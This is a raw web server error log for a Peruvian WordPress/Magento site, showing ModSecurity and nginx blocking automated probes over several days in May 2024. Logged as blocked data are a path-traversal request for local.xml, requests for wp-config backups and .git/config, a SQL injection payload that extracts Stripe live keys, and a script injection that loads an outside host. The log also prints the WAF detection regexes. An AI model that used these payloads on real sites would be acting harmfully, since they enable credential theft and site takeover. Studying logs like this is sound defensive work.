[:error] [pid 8515:tid 140674617104128] [client 213.142.159.168:45680] [client 213.142.159.168] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/shop/magmi-importer/web/download_file.php"] [unique_id "ZkxF5bjIZaSoo3xuGrHVKgAAAMA"] [Tue May 21 03:40:24.349371 2024] [ssl:warn] [pid 5064:tid 140485744228224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 03:40:28.599642 2024] [ssl:warn] [pid 5066:tid 140485744228224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 03:40:29.122604 2024] [ssl:warn] [pid 5066:tid 140485744228224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 03:40:31.350298 2024] [ssl:warn] [pid 5066:tid 140485744228224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 03:40:33.636407 2024] [ssl:warn] [pid 5486:tid 140101414348672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 03:40:45.844620 2024] [ssl:warn] [pid 5489:tid 140101414348672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 08:57:44.537454 2024] [ssl:warn] [pid 1007:tid 140653347514240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 08:57:53.541521 2024] [ssl:warn] [pid 1797:tid 140653347514240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 09:39:45.506053 2024] [ssl:warn] [pid 1797:tid 140653347514240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 09:39:53.390908 2024] [ssl:warn] [pid 1797:tid 140653347514240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 09:40:56.057389 2024] [ssl:warn] [pid 1797:tid 140653347514240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 09:43:35.284167 2024] [ssl:warn] [pid 13172:tid 139666359183232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 09:43:39.521828 2024] [ssl:warn] [pid 13186:tid 139666359183232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 12:27:29.102814 2024] [autoindex:error] [pid 13189:tid 139665969448704] [client 159.223.34.107:59544] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue May 21 17:51:10.093740 2024] [:error] [pid 13458:tid 139665935877888] [client 178.159.37.38:41062] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zk0lXnMKw9Mwb3zbd2IUZQAAANQ"], referer: www.google.com [Tue May 21 17:51:10.784137 2024] [:error] [pid 13187:tid 139665919092480] [client 178.159.37.38:41064] [client 178.159.37.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zk0lXiv-p57TmpeE092KZgAAABY"], referer: www.google.com [Tue May 21 19:03:33.718492 2024] [ssl:warn] [pid 13186:tid 139666359183232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue May 21 20:38:59.939004 2024] [autoindex:error] [pid 9255:tid 139665935877888] [client 159.223.34.107:44504] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 22 03:37:27.779674 2024] [ssl:warn] [pid 628:tid 140082484418432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 22 03:37:36.097195 2024] [ssl:warn] [pid 636:tid 140082484418432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 22 03:37:36.614544 2024] [ssl:warn] [pid 636:tid 140082484418432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 22 03:37:38.559151 2024] [ssl:warn] [pid 636:tid 140082484418432] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 22 03:37:40.819858 2024] [ssl:warn] [pid 1104:tid 140353644222336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 22 03:37:49.067517 2024] [ssl:warn] [pid 1113:tid 140353644222336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed May 22 11:13:34.488658 2024] [autoindex:error] [pid 1985:tid 140353340430080] [client 159.223.34.107:57474] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed May 22 11:34:13.699143 2024] [:error] [pid 1138:tid 140353248110336] [client 179.43.191.18:57754] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: http://investigacionperu.com [Wed May 22 13:38:11.776546 2024] [:error] [pid 1138:tid 140353222932224] [client 213.142.159.168:59742] [client 213.142.159.168] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi/web/download_file.php"] [unique_id "Zk47k_JkXxV1bkCn8eVqqAAAAFQ"] [Wed May 22 13:38:12.470743 2024] [:error] [pid 1138:tid 140353453082368] [client 213.142.159.168:59744] [client 213.142.159.168] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/shop/magmi/web/download_file.php"] [unique_id "Zk47lPJkXxV1bkCn8eVqqQAAAEE"] 2024/05/22 13:43:12 [error] 965#965: *17090 access forbidden by rule, client: 104.167.196.145, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed May 22 20:16:40.293489 2024] [:error] [pid 1139:tid 140353290073856] [client 103.148.14.50:37674] [client 103.148.14.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_value%20like%20%27%25pk_live%25%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "Zk6Y-EHoaE0vyq5hsdteTAAAAIw"] [Wed May 22 23:32:18.235677 2024] [authz_core:error] [pid 1138:tid 140353340430080] [client 188.166.108.93:41912] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/22 23:32:21 [error] 965#965: *24262 access forbidden by rule, client: 188.166.108.93, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu May 23 00:16:27.221009 2024] [authz_core:error] [pid 1985:tid 140353315251968] [client 159.89.17.243:42714] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/23 00:16:31 [error] 966#966: *24836 access forbidden by rule, client: 159.89.17.243, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu May 23 03:49:21.261150 2024] [ssl:warn] [pid 16214:tid 140456919013248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 23 03:49:33.532719 2024] [ssl:warn] [pid 16215:tid 140456919013248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 23 03:49:35.132843 2024] [ssl:warn] [pid 16215:tid 140456919013248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 23 03:49:37.433684 2024] [ssl:warn] [pid 16215:tid 140456919013248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 23 03:49:39.729734 2024] [ssl:warn] [pid 16664:tid 139841988556672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 23 03:49:43.955860 2024] [ssl:warn] [pid 16665:tid 139841988556672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu May 23 06:20:58.017674 2024] [authz_core:error] [pid 16684:tid 139841668880128] [client 209.97.180.8:48864] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/23 06:21:01 [error] 16554#16554: *28899 access forbidden by rule, client: 209.97.180.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu May 23 06:55:59.263130 2024] [authz_core:error] [pid 17305:tid 139841710843648] [client 159.89.12.166:49330] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/23 06:56:03 [error] 16554#16554: *29150 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu May 23 07:18:08.458711 2024] [:error] [pid 16682:tid 139841601738496] [client 213.142.159.168:50426] [client 213.142.159.168] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi-importer/conf/magmi.ini"] [unique_id "Zk80AFn9ifPgHvIxxtCq7AAAABA"] [Thu May 23 07:18:10.217037 2024] [:error] [pid 17305:tid 139841559774976] [client 213.142.159.168:50432] [client 213.142.159.168] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/shop/magmi-importer/conf/magmi.ini"] [unique_id "Zk80AtY_v7ruZ8DevaUA8wAAANU"] [Thu May 23 09:07:00.807964 2024] [:error] [pid 16684:tid 139841719236352] [client 185.220.101.11:32822] [client 185.220.101.11] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Zk9NhPf8pAFRuonZDAM5ZAAAAII"] [Thu May 23 09:07:28.503801 2024] [:error] [pid 16684:tid 139841593345792] [client 185.220.101.11:32844] [client 185.220.101.11] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Zk9NoPf8pAFRuonZDAM5ZwAAAJE"] [Thu May 23 09:08:13.931896 2024] [:error] [pid 16683:tid 139841805809408] [client 185.220.101.11:32876] [client 185.220.101.11] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config.bak"] [unique_id "Zk9NzYqO9S0R4D2K_OlIagAAAEA"] [Thu May 23 09:08:19.700783 2024] [:error] [pid 16683:tid 139841593345792] [client 185.220.101.11:32878] [client 185.220.101.11] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config.old"] [unique_id "Zk9N04qO9S0R4D2K_OlIawAAAFE"] [Thu May 23 09:08:43.522784 2024] [:error] [pid 17305:tid 139841626916608] [client 185.220.101.11:32884] [client 185.220.101.11] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Zk9N69Y_v7ruZ8DevaUFUQAAAM0"] [Thu May 23 09:09:56.570445 2024] [:error] [pid 17305:tid 139841601738496] [client 192.42.116.215:32912] [client 192.42.116.215] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Zk9ONNY_v7ruZ8DevaUFWAAAANA"] [Thu May 23 13:25:09.591630 2024] [:error] [pid 16682:tid 139841710843648] [client 89.248.174.11:38196] [client 89.248.174.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://go.kcloudinc.com></script> found within ARGS:result[_msg]: <script src=https://go.kcloudinc.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "Zk-KBVn9ifPgHvIxxtCtqQAAAAM"] [Thu May 23 13:34:09.480549 2024] [autoindex:error] [pid 17305:tid 139841576560384] [client 159.223.34.107:38742] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu May 23 20:20:29.626171 2024] [authz_core:error] [pid 16682:tid 139841668880128] [client 207.154.197.113:47210] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/23 20:20:34 [error] 16554#16554: *39853 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri May 24 03:43:21.833694 2024] [ssl:warn] [pid 883:tid 139860014815104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 24 03:43:30.207214 2024] [ssl:warn] [pid 886:tid 139860014815104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 24 03:43:30.779347 2024] [ssl:warn] [pid 886:tid 139860014815104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 24 03:43:32.833809 2024] [ssl:warn] [pid 886:tid 139860014815104] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 24 03:43:35.175214 2024] [ssl:warn] [pid 1553:tid 140234290431872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 24 03:43:43.559608 2024] [ssl:warn] [pid 1556:tid 140234290431872] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri May 24 04:47:23.545080 2024] [authz_core:error] [pid 1791:tid 140233920157440] [client 64.226.78.121:58584] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/24 04:47:26 [error] 1527#1527: *45548 access forbidden by rule, client: 64.226.78.121, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri May 24 05:06:43.517600 2024] [authz_core:error] [pid 1590:tid 140233987299072] [client 23.239.4.252:58958] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/24 05:06:46 [error] 1526#1526: *45808 access forbidden by rule, client: 23.239.4.252, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri May 24 06:43:03.416924 2024] [authz_core:error] [pid 1791:tid 140233894979328] [client 143.110.217.244:59918] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/05/24 06:43:06 [error] 1526#1526: *46391 access forbidden by rule, client: 143.110.217.244, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri May 24 08:14:43.172982 2024] [:error] [pid 1590:tid 140234037655296] [client 161.97.165.57:33158] [client 161.97.165.57] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id 